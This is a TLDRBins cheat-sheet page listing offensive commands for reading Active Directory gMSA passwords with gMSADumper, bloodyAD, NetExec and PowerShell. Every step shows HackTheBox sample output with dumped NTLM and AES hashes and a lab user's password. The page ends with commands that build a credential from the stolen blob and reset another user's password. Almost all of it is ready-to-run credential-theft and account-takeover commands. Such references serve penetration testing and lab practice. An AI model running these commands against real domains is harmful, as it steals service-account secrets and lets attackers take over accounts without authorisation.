TLDRBins TLDRBins / ReadGMSAPassword

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Read GMSAPassword

1. Set Allowed to Retrieve the Password for this MSA [Optional]

Set-ADServiceAccount -Identity "<TARGET_IDENTITY>" -PrincipalsAllowedToRetrieveManagedPassword "<USER>"

Sample Output:
TO-DO

2. Read GMSA Password

# Password
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -l <DC>

Sample Output:
$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3

# NTLM
python3 gMSADumper.py -u '<USER>' -p '<LM_HASH>:<NT_HASH>'-d <DOMAIN> -l <DC>

Sample Output:
$ python3 gMSADumper.py -u 'ted.graves' -p 'aad3b435b51404eeaad3b435b51404ee:421001de12db5325304b41275a0407b9'-d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3

# Ticket-based Kerberos
python3 gMSADumper.py -k -d <DOMAIN> -l <DC> 

Sample Output:
$ python3 gMSADumper.py -k -d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3

Ref: gMSADumper

# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword

Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p 'Mr.Teddy' --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==

# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword

Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p ':2B576ACBE6BCFDA7294D6BD18041B8FE' -f rc4 --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==

# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword

Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p 'Mr.Teddy' -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==

# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword

Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p '2B576ACBE6BCFDA7294D6BD18041B8FE' -f rc4 -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==

# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword

Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword

distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==

Ref: bloodyAD

# Password
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --gmsa

Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -p 'Mr.Teddy' --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.10.248    636    DC               [+] intelligence.htb\ted.graves:Mr.Teddy 
LDAPS       10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.10.248    636    DC               Account: svc_int$             NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4

# NTLM
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' --gmsa

Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -H '421001DE12DB5325304B41275A0407B9' --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.10.248    636    DC               [+] intelligence.htb\ted.graves:421001DE12DB5325304B41275A0407B9
LDAPS       10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.10.248    636    DC               Account: svc_int$             NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4

# Password-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --kdcHost <DC> --gmsa

Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -p 'Mr.Teddy' -k --kdcHost intelligence.htb --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.10.248    636    DC               [+] intelligence.htb\ted.graves:Mr.Teddy 
LDAPS       10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.10.248    636    DC               Account: svc_int$             NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4

# NTLM-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --kdcHost <DC> --gmsa

Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -H '421001DE12DB5325304B41275A0407B9' -k --kdcHost intelligence.htb --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.10.248    636    DC               [+] intelligence.htb\ted.graves:421001DE12DB5325304B41275A0407B9
LDAPS       10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.10.248    636    DC               Account: svc_int$             NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4

# Ticket-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -k --kdcHost <DC> --use-kcache --gmsa

Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -k --kdcHost intelligence.htb --use-kcache --gmsa
SMB         10.10.10.248    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.10.248    636    DC               [+] intelligence.htb\ted.graves:Mr.Teddy 
LDAPS       10.10.10.248    636    DC               [*] Getting GMSA Passwords
LDAPS       10.10.10.248    636    DC               Account: svc_int$             NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4

Save as Cred

$gmsa = Get-ADServiceAccount -Identity '<TARGET_IDENTITY>' -Properties 'msDS-ManagedPassword'

Sample Output:
PS C:\programdata> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'

$mp = $gmsa.'msDS-ManagedPassword'

Sample Output:
PS C:\programdata> $mp = $gmsa.'msDS-ManagedPassword

PS C:\programdata> ConvertFrom-ADManagedPasswordBlob $mp

Version                   : 1
CurrentPassword           : ꪌ絸禔හॐ๠뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
                            ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword     : System.Security.SecureString
PreviousPassword          : 
SecurePreviousPassword    : 
QueryPasswordInterval     : 2019.19:45:41.4967000
UnchangedPasswordInterval : 2019.19:40:41.4967000

$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword

Sample Output:
PS C:\programdata> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword

$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword

Sample Output:
PS C:\programdata> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword

$cred = New-Object System.Management.Automation.PSCredential '<TARGET_IDENTITY>', $SecPass

Sample Output:
PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA', $SecPass

# For example, change password of another target user
Invoke-Command -ComputerName <COMPUTER_NAME> -ScriptBlock {Set-ADAccountPassword -Identity '<ANOTHER_TARGET_NAME>' -reset -NewPassword (ConvertTo-SecureString -AsPlainText '<NEW_PASSWORD>' -force)} -Credential $cred

Sample Output:
PS C:\programdata> Invoke-Command -ComputerName . -ScriptBlock {Set-ADAccountPassword -Identity 'tristan.davies' -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Test1234' -force)} -Credential $cred